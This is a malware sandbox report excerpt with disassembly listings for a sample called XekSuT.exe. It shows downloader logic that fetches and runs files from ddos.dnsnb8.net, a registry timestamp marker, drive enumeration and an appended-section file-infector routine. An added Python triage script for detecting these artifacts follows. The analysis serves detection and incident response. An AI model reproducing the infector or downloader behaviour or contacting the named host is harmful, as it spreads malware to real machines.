                                                                                                                • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                                                                                • String ID: %s*$C:\$Documents and Settings
                                                                                                                • API String ID: 2826467728-110786608
                                                                                                                • Opcode ID: 8cd6e35f4c0c35389192d905c0ca717eb11f0dcb942da10b762e48713665a7c6
                                                                                                                • Instruction ID: 723289a0f609dd17c1b45d997e1b183c0b25416b3a2808884a10a57f35261411
                                                                                                                • Opcode Fuzzy Hash: 8cd6e35f4c0c35389192d905c0ca717eb11f0dcb942da10b762e48713665a7c6
                                                                                                                • Instruction Fuzzy Hash: A34145B3404349AFD722DBA0DC49EEB77ACEB84315F04492DF545D7111EA35EE4887A2

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                APIs
                                                                                                                  • Part of subcall function 003C185B: GetSystemTimeAsFileTime.KERNEL32(003C1F92,00000000,?,00000000,?,?,?,003C1F92,?,00000000,00000002), ref: 003C1867
                                                                                                                  • Part of subcall function 003C185B: srand.MSVCRT ref: 003C1878
                                                                                                                  • Part of subcall function 003C185B: rand.MSVCRT ref: 003C1880
                                                                                                                  • Part of subcall function 003C185B: srand.MSVCRT ref: 003C1890
                                                                                                                  • Part of subcall function 003C185B: rand.MSVCRT ref: 003C1894
                                                                                                                • WinExec.KERNEL32(?,00000005), ref: 003C10F1
                                                                                                                • lstrlen.KERNEL32(003C4748), ref: 003C10FA
                                                                                                                • wsprintfA.USER32 ref: 003C112A
                                                                                                                • wsprintfA.USER32 ref: 003C1143
                                                                                                                • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 003C115B
                                                                                                                • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 003C1169
                                                                                                                • Sleep.KERNEL32 ref: 003C1179
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                                                                                                • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG<$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                                                • API String ID: 1280626985-347476361
                                                                                                                • Opcode ID: 2772db15e1146c17cdc7ced80cca5488cae07604988378e299e435ac297391fd
                                                                                                                • Instruction ID: 36e0a791c3041ab6173331723dcab9551f7f5fbd6a8ff73c372d3360b0b77300
                                                                                                                • Opcode Fuzzy Hash: 2772db15e1146c17cdc7ced80cca5488cae07604988378e299e435ac297391fd
                                                                                                                • Instruction Fuzzy Hash: 84218C76900258BEDB22EBA0DC58FEEBBBCAB06315F158099E501E2051D774AF84DF60

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 003C60BE
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003C60DF
                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 003C6189
                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003C61A5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$AllocFree
                                                                                                                • String ID: kernel32.dll
                                                                                                                • API String ID: 2087232378-1793498882
                                                                                                                • Opcode ID: 621a3066ca2bd9a9425db078893b70ebb09a415472c7c4598c8aa5b83e7a16b5
                                                                                                                • Instruction ID: 69ea61542314a796dcfd31355d36cf276f92efecea5d65779cac2ef4887168cb
                                                                                                                • Opcode Fuzzy Hash: 621a3066ca2bd9a9425db078893b70ebb09a415472c7c4598c8aa5b83e7a16b5
                                                                                                                • Instruction Fuzzy Hash: CE1221B25087848FDB328F64CC56FEA3BA4EF02310F1945AED88ACB693D674AD01C755

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 348 3c1718-3c1733 GetSystemTimeAsFileTime 349 3c1754-3c1758 348->349 350 3c1735-3c1752 SHSetValueA 348->350 351 3c17c6-3c17cd 349->351 352 3c175a-3c1784 SHGetValueA 349->352 350->351 352->351 353 3c1786-3c17b3 call 3c2cf0 * 2 352->353 353->351 358 3c17b5 353->358 359 3c17bf 358->359 360 3c17b7-3c17bd 358->360 359->351 360->351 360->359
                                                                                                                APIs
                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C1729
                                                                                                                • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 003C174C
                                                                                                                • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 003C177C
                                                                                                                • __aulldiv.LIBCMT ref: 003C1796
                                                                                                                • __aulldiv.LIBCMT ref: 003C17A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TimeValue__aulldiv$FileSystem
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\XekSuT.exe$SOFTWARE\GTplus$Time
                                                                                                                • API String ID: 541852442-4253519813
                                                                                                                • Opcode ID: e99cfb7b85ee52f50c76c78203ccb83d2dd6313ebaf872645b9fd0aaf833ca19
                                                                                                                • Instruction ID: 6b917fdeffe3dafc1c96bd68ac0cd107a7a91421a5a3aef7de37dd2becf98410
                                                                                                                • Opcode Fuzzy Hash: e99cfb7b85ee52f50c76c78203ccb83d2dd6313ebaf872645b9fd0aaf833ca19
                                                                                                                • Instruction Fuzzy Hash: 00118272A00209BFDB12AB94CC89FEF7BBCEB45B54F10C519F901F6181D6719E459B60

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 361 3c2b8c-3c2bc6 memset GetLogicalDriveStringsA 362 3c2bc8-3c2bcc 361->362 363 3c2c09-3c2c28 WaitForMultipleObjects 361->363 366 3c2bce-3c2bd0 362->366 367 3c2bfa-3c2c07 lstrlen 362->367 364 3c2c3c-3c2c45 363->364 365 3c2c2a-3c2c3a CreateThread 363->365 365->364 366->367 368 3c2bd2-3c2bdc GetDriveTypeA 366->368 367->362 367->363 368->367 369 3c2bde-3c2be1 368->369 369->367 370 3c2be3-3c2bf6 CreateThread 369->370 370->367
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 003C2BA6
                                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 003C2BB4
                                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 003C2BD3
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,003C2B7D,?,00000000,00000000), ref: 003C2BEE
                                                                                                                • lstrlen.KERNEL32(?), ref: 003C2BFB
                                                                                                                • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 003C2C16
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,003C2845,00000000,00000000,00000000), ref: 003C2C3A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1073171358-0
                                                                                                                • Opcode ID: 4163f3558b91fa3eb08fa0c922e1258ef2734a8b91dfe1248867058501003353
                                                                                                                • Instruction ID: 1ebeb6a579c03debef39ae02c49b7861cedc4711a5ab55b29622c2b8f1d85a34
                                                                                                                • Opcode Fuzzy Hash: 4163f3558b91fa3eb08fa0c922e1258ef2734a8b91dfe1248867058501003353
                                                                                                                • Instruction Fuzzy Hash: 5521A5B284015CAFE722AFA4AC84EEF7B6DFB05344F164129F952D2151D734AD06CB61

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 3c1e6e-3c1e95 call 3c2d60 3 3c1e9c-3c1eaa call 3c1df6 0->3 4 3c1e97 call 3c1d8a 0->4 8 3c1eb0-3c1ed9 SetFileAttributesA CreateFileA 3->8 9 3c2332 3->9 4->3 8->9 10 3c1edf-3c1f28 call 3c1915 SetFilePointer CreateFileMappingA MapViewOfFile 8->10 11 3c2338-3c233b 9->11 10->9 18 3c1f2e-3c1f39 10->18 13 3c233d-3c2340 UnmapViewOfFile 11->13 14 3c2346-3c2349 11->14 13->14 16 3c234b-3c234e CloseHandle 14->16 17 3c2350-3c2354 14->17 19 3c2356-3c235b CloseHandle 17->19 20 3c2391-3c239a call 3c2d9b 17->20 18->9 21 3c1f3f-3c1f56 18->21 19->20 21->9 23 3c1f5c-3c1f64 21->23 23->9 25 3c1f6a-3c1f70 23->25 25->9 26 3c1f76-3c1f87 call 3c1c81 25->26 26->9 29 3c1f8d-3c1fa7 call 3c185b call 3c1c81 26->29 29->9 34 3c1fad-3c1fb4 29->34 35 3c2024-3c2045 34->35 36 3c1fb6-3c1fc5 call 3c1af9 34->36 35->9 38 3c204b-3c204e 35->38 36->35 44 3c1fc7-3c1fd2 36->44 39 3c2070-3c20f4 call 3c1af9 * 2 call 3c1c68 * 2 memset * 2 38->39 40 3c2050-3c2053 38->40 62 3c20f5-3c20fe 39->62 42 3c2056-3c205a 40->42 42->39 45 3c205c-3c2061 42->45 44->9 47 3c1fd8-3c1fe7 44->47 45->9 48 3c2067-3c206e 45->48 50 3c1fef-3c2006 call 3c1af9 47->50 51 3c1fe9-3c1fec 47->51 48->42 57 3c2008-3c200e call 3c1c68 50->57 58 3c2013-3c201e FlushViewOfFile 50->58 51->50 57->58 58->35 63 3c2130-3c2139 62->63 64 3c2100-3c2114 62->64 65 3c213c-3c2142 63->65 66 3c212d-3c212e 64->66 67 3c2116-3c212a 64->67 68 3c215c 65->68 69 3c2144-3c2150 65->69 66->62 67->66 72 3c215f-3c2162 68->72 70 3c2157-3c215a 69->70 71 3c2152-3c2154 69->71 70->65 71->70 73 3c2164-3c2171 72->73 74 3c2181-3c2184 72->74 75 3c232a-3c232d 73->75 76 3c2177-3c217e 73->76 77 3c218d-3c21ba call 3c1c68 74->77 78 3c2186 74->78 75->72 76->74 81 3c21bc-3c21d0 call 3c1c68 77->81 82 3c21d3-3c220b call 3c1c81 call 3c1c68 77->82 78->77 81->82 89 3c220d-3c2218 call 3c1c68 82->89 90 3c221b-3c221e 82->90 89->90 92 3c2226-3c231a memcpy UnmapViewOfFile CloseHandle call 3c1b8a call 3c185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 3c1915 90->92 93 3c2220-3c2223 90->93 100 3c231f-3c2328 CloseHandle 92->100 93->92 100->11
                                                                                                                APIs
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,003C32B0,00000164,003C2986,?), ref: 003C1EB9
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 003C1ECD
                                                                                                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 003C1EF3
                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 003C1F07
                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 003C1F1D
                                                                                                                • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 003C201E
                                                                                                                • memset.MSVCRT ref: 003C20D8
                                                                                                                • memset.MSVCRT ref: 003C20EA
                                                                                                                • memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C222D
                                                                                                                • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C2238
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C224A
                                                                                                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C22C6
                                                                                                                • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C22CB
                                                                                                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C22DD
                                                                                                                • WriteFile.KERNEL32(000000FF,003C4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C22F7
                                                                                                                • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C230D
                                                                                                                • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003C2322
                                                                                                                • UnmapViewOfFile.KERNEL32(?,?,003C32B0,00000164,003C2986,?), ref: 003C2340
                                                                                                                • CloseHandle.KERNEL32(?,?,003C32B0,00000164,003C2986,?), ref: 003C234E
                                                                                                                • CloseHandle.KERNEL32(000000FF,?,003C32B0,00000164,003C2986,?), ref: 003C2359
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                                                                                                                • String ID: .@<$5@<$<@<$C@<$m@<
                                                                                                                • API String ID: 3043204753-572888031
                                                                                                                • Opcode ID: fcc5dbd23ea996420a79f068dc3c42d4282c5d6a03c705eec8f19165649a05cf
                                                                                                                • Instruction ID: 441f02c0f2423a8c4ceb9ed5c5edb0398dc4c658029ee33becba7b0afd4a8a38
                                                                                                                • Opcode Fuzzy Hash: fcc5dbd23ea996420a79f068dc3c42d4282c5d6a03c705eec8f19165649a05cf
                                                                                                                • Instruction Fuzzy Hash: 1FF12875900218AFCB22DFA4D885EAEBBB5FF08314F10852EE50AEB661D730AD51CF54

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 117 3c1973-3c199a PathFileExistsA 118 3c1ac7-3c1acc 117->118 119 3c19a0-3c19aa 117->119 120 3c1ace 118->120 121 3c1ad0-3c1ad5 118->121 122 3c19af-3c19c2 CreateFileA 119->122 120->121 123 3c1ad7-3c1ad9 121->123 124 3c1af0-3c1af6 121->124 125 3c1a28-3c1a36 GetFileSize 122->125 126 3c19c4-3c19d3 Sleep 122->126 123->124 127 3c1a38-3c1a3b 125->127 128 3c1a87-3c1a8b 125->128 126->122 129 3c19d5-3c1a0b call 3c185b wsprintfA CopyFileA 126->129 127->128 130 3c1a3d-3c1a51 VirtualAlloc 127->130 131 3c1a8d-3c1a90 CloseHandle 128->131 132 3c1a96-3c1a9a 128->132 129->125 143 3c1a0d-3c1a26 CreateFileA 129->143 130->128 134 3c1a53-3c1a57 130->134 131->132 135 3c1a9c 132->135 136 3c1aad-3c1ab1 132->136 138 3c1a59-3c1a6d ReadFile 134->138 139 3c1a80 134->139 140 3c1aa0-3c1aa7 DeleteFileA 135->140 141 3c1adb-3c1ae0 136->141 142 3c1ab3-3c1ab6 136->142 138->128 145 3c1a6f-3c1a7e 138->145 139->128 140->136 146 3c1ae7-3c1aec 141->146 147 3c1ae2-3c1ae5 141->147 142->118 148 3c1ab8-3c1ac1 VirtualFree 142->148 143->125 144 3c1a9e 143->144 144->140 145->138 145->139 146->124 149 3c1aee 146->149 147->146 148->118 149->124
                                                                                                                APIs
                                                                                                                • PathFileExistsA.SHLWAPI(\N<`N<,00000000,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C1992
                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003C19BA
                                                                                                                • Sleep.KERNEL32(00000064), ref: 003C19C6
                                                                                                                • wsprintfA.USER32 ref: 003C19EC
                                                                                                                • CopyFileA.KERNEL32(?,?,00000000), ref: 003C1A00
                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C1A1E
                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 003C1A2C
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 003C1A46
                                                                                                                • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 003C1A65
                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 003C1A90
                                                                                                                • DeleteFileA.KERNEL32(?), ref: 003C1AA7
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003C1AC1
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 003C19DB
                                                                                                                • C:\Users\user\AppData\Local\Temp\XekSuT.exe, xrefs: 003C197C
                                                                                                                • \N<`N<, xrefs: 003C1980
                                                                                                                • %s%.8X.data, xrefs: 003C19E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
                                                                                                                • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XekSuT.exe$\N<`N<
                                                                                                                • API String ID: 716042067-2382788371
                                                                                                                • Opcode ID: 49e32dd09ef4940f743bf950e07731fe0d7d062bc0c454f80c6d0ee41cfe0e7f
                                                                                                                • Instruction ID: ffcae3967c11e4d1c196c111dd6c44d68304c92bffb2c811937a0f9c65e5269b
                                                                                                                • Opcode Fuzzy Hash: 49e32dd09ef4940f743bf950e07731fe0d7d062bc0c454f80c6d0ee41cfe0e7f
                                                                                                                • Instruction Fuzzy Hash: 8F518C76900219EFDB229FA8CC84EAEBBBCFB06354F10456DF516E6191C3709E40DBA0
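Three of the functions above leave host artifacts that an incident responder can check for directly. The routine at 003C1718 writes the current FILETIME to the registry with SHSetValueA(0x80000002, "SOFTWARE\GTplus", "Time", 3, buf, 8): 0x80000002 is HKEY_LOCAL_MACHINE, type 3 is REG_BINARY, and 8 bytes is sizeof(FILETIME). The routine at 003C1E6E maps the first 0x400 bytes of a target with FILE_MAP_ALL_ACCESS (0x000F001F), copies 0x28 bytes (sizeof(IMAGE_SECTION_HEADER)) into the mapped headers, then seeks to FILE_END (2), calls SetEndOfFile and appends a 0x271-byte buffer from 003C4008 followed by a second WriteFile, which is the write pattern of an appended-section infector. The routine at 003C1973 stages a read-only copy of the source file in Temp under the name wsprintfA("%s%.8X.data", ...) before reading it into a VirtualAlloc buffer and deleting it. The script below is an added example, not code from the sample, from Joe Sandbox or from any vendor: it decodes the registry FILETIME, matches the Temp staging name, and applies a three-part heuristic for an appended executable section that now owns the entry point. It assumes a 32-bit PE target and builds a constructed test PE in memory; the section name `.tail`, the stub bytes and the file layout are made up for the test, since the report does not name the section the infector writes.

```python
"""Triage helpers for host artifacts documented by this report's disassembly.

Added example, not code from the sample, from Joe Sandbox or from any vendor.
Assumptions: a 32-bit PE target; an infected file ends in a newly appended
section that holds the entry point; the Temp staging copy follows the
"%s%.8X.data" format shown above. The PE bytes built below are constructed
for the test only; the report does not name the section the infector writes.
"""
import re
import struct
from datetime import datetime, timedelta, timezone

IMAGE_SCN_MEM_EXECUTE = 0x20000000
SECTION_HEADER_SIZE = 0x28                 # IMAGE_SECTION_HEADER, the memcpy length above
STAGING_NAME = re.compile(r'^[0-9A-F]{8}\.data$', re.I)   # wsprintfA "%s%.8X.data"


def decode_filetime(raw):
    """Decode the 8-byte REG_BINARY FILETIME written to HKLM\\SOFTWARE\\GTplus\\Time
    (100 ns ticks since 1601-01-01 UTC; __aulldiv above scales the same value)."""
    ticks, = struct.unpack('<Q', raw)
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ticks // 10)


def is_staging_name(filename):
    """True for a leftover Temp copy named like 0123ABCD.data."""
    return STAGING_NAME.match(filename) is not None


def parse_sections(data):
    """Return (entry_rva, section list) from a PE file image."""
    if data[:2] != b'MZ':
        raise ValueError('not an MZ file')
    pe, = struct.unpack_from('<I', data, 0x3C)
    if data[pe:pe + 4] != b'PE\0\0':
        raise ValueError('bad PE signature')
    nsec, = struct.unpack_from('<H', data, pe + 6)
    opt_size, = struct.unpack_from('<H', data, pe + 20)
    entry_rva, = struct.unpack_from('<I', data, pe + 24 + 16)     # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        off = pe + 24 + opt_size + i * SECTION_HEADER_SIZE
        name, vsize, rva, rawsize, rawptr = struct.unpack_from('<8sIIII', data, off)
        chars, = struct.unpack_from('<I', data, off + 36)
        sections.append(dict(name=name.rstrip(b'\0').decode('latin-1'), vsize=vsize,
                             rva=rva, rawsize=rawsize, rawptr=rawptr, chars=chars))
    return entry_rva, sections


def appended_section_indicators(data):
    """Indicators matching the write sequence above: a section header dropped into
    the mapped PE header, payload appended after SetEndOfFile, entry point moved."""
    entry_rva, sections = parse_sections(data)
    if not sections:
        return []
    last, found = sections[-1], []
    if last['rva'] <= entry_rva < last['rva'] + max(last['vsize'], last['rawsize']):
        found.append('entry point in last section')
    if last['chars'] & IMAGE_SCN_MEM_EXECUTE:
        found.append('last section executable')
    if (last['rawptr'] + last['rawsize'] == len(data)
            and all(s['rawptr'] + s['rawsize'] <= last['rawptr'] for s in sections[:-1])):
        found.append('last section data sits at end of file')
    return found


def looks_infected(data):
    """All three indicators together; any single one is common in clean files."""
    return len(appended_section_indicators(data)) == 3


def build_pe32(sections, entry_rva, file_align=0x200, sect_align=0x1000):
    """Minimal, non-loadable PE32 from (name, rva, characteristics, raw) tuples; test input only."""
    nsec, opt_size = len(sections), 0xE0
    headers_size = -(-(0x40 + 4 + 20 + opt_size + nsec * SECTION_HEADER_SIZE) // file_align) * file_align
    dos = b'MZ' + b'\0' * 0x3A + struct.pack('<I', 0x40)           # e_lfanew = 0x40
    coff = struct.pack('<HHIIIHH', 0x14C, nsec, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into('<H', opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into('<I', opt, 16, entry_rva)
    struct.pack_into('<I', opt, 28, 0x400000)                       # ImageBase
    struct.pack_into('<II', opt, 32, sect_align, file_align)
    struct.pack_into('<I', opt, 60, headers_size)
    struct.pack_into('<I', opt, 92, 16)                             # NumberOfRvaAndSizes
    table, body, rawptr = b'', b'', headers_size
    for name, rva, chars, raw in sections:
        rawsize = -(-len(raw) // file_align) * file_align
        table += struct.pack('<8sIIIIIIHHI', name.ljust(8, b'\0'), len(raw), rva,
                             rawsize, rawptr, 0, 0, 0, 0, chars)
        body += raw.ljust(rawsize, b'\0')
        rawptr += rawsize
    return (dos + b'PE\0\0' + coff + bytes(opt) + table).ljust(headers_size, b'\0') + body


# Constructed samples: a clean two-section file, and a copy with an executable
# section appended and the entry point redirected into it.
CODE = b'\x55\x89\xe5\x31\xc0\x5d\xc3'           # push ebp; mov ebp,esp; xor eax,eax; pop ebp; ret
STUB = b'\xe9\x00\x00\x00\x00' + b'\x90' * 16     # jmp rel32 placeholder, then NOPs
CLEAN_PE = build_pe32([(b'.text', 0x1000, 0x60000020, CODE),
                       (b'.data', 0x2000, 0xC0000040, b'hello\0')], entry_rva=0x1000)
TAINTED_PE = build_pe32([(b'.text', 0x1000, 0x60000020, CODE),
                         (b'.data', 0x2000, 0xC0000040, b'hello\0'),
                         (b'.tail', 0x3000, 0xE0000020, STUB)], entry_rva=0x3000)

if __name__ == '__main__':
    for label, blob in (('clean', CLEAN_PE), ('tainted', TAINTED_PE)):
        print(label, looks_infected(blob), appended_section_indicators(blob))
    print(decode_filetime(bytes.fromhex('00803ed5deb19d01')))    # 1970-01-01 00:00:00+00:00
```

The heuristic is for triage, not a verdict: a clean file's last section normally also sits at the end of the file, and some packers place the entry point in a late section, so only the combination of all three indicators is reported as suspicious. The report's second WriteFile has no fixed length, so nothing here depends on the 0x271-byte size or on any section name.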

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 150 3c28b8-3c28ff memset wsprintfA 151 3c29db-3c29df 150->151 152 3c2905-3c290d 150->152 152->151 153 3c2913-3c2919 152->153 154 3c291b-3c294c memset wsprintfA call 3c29e2 153->154 155 3c2956-3c2965 strrchr 153->155 158 3c2951 154->158 155->151 157 3c2967-3c2978 lstrcmpiA 155->157 159 3c2988-3c2992 lstrcmpiA 157->159 160 3c297a-3c2981 call 3c1e6e 157->160 158->151 159->151 162 3c2994-3c299b 159->162 163 3c2986 160->163 164 3c29ad-3c29c9 strstr 162->164 165 3c299d-3c29a3 162->165 163->151 167 3c29cb-3c29d1 call 3c239d 164->167 168 3c29d3-3c29d6 call 3c2692 164->168 165->164 166 3c29a5-3c29a7 lstrcpy 165->166 166->164 167->151 168->151
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 003C28D3
                                                                                                                • wsprintfA.USER32 ref: 003C28F7
                                                                                                                • memset.MSVCRT ref: 003C2925
                                                                                                                • wsprintfA.USER32 ref: 003C2940
                                                                                                                  • Part of subcall function 003C29E2: memset.MSVCRT ref: 003C2A02
                                                                                                                  • Part of subcall function 003C29E2: wsprintfA.USER32 ref: 003C2A1A
                                                                                                                  • Part of subcall function 003C29E2: memset.MSVCRT ref: 003C2A44
                                                                                                                  • Part of subcall function 003C29E2: lstrlen.KERNEL32(?), ref: 003C2A54
                                                                                                                  • Part of subcall function 003C29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 003C2A6C
                                                                                                                  • Part of subcall function 003C29E2: strrchr.MSVCRT ref: 003C2A7C
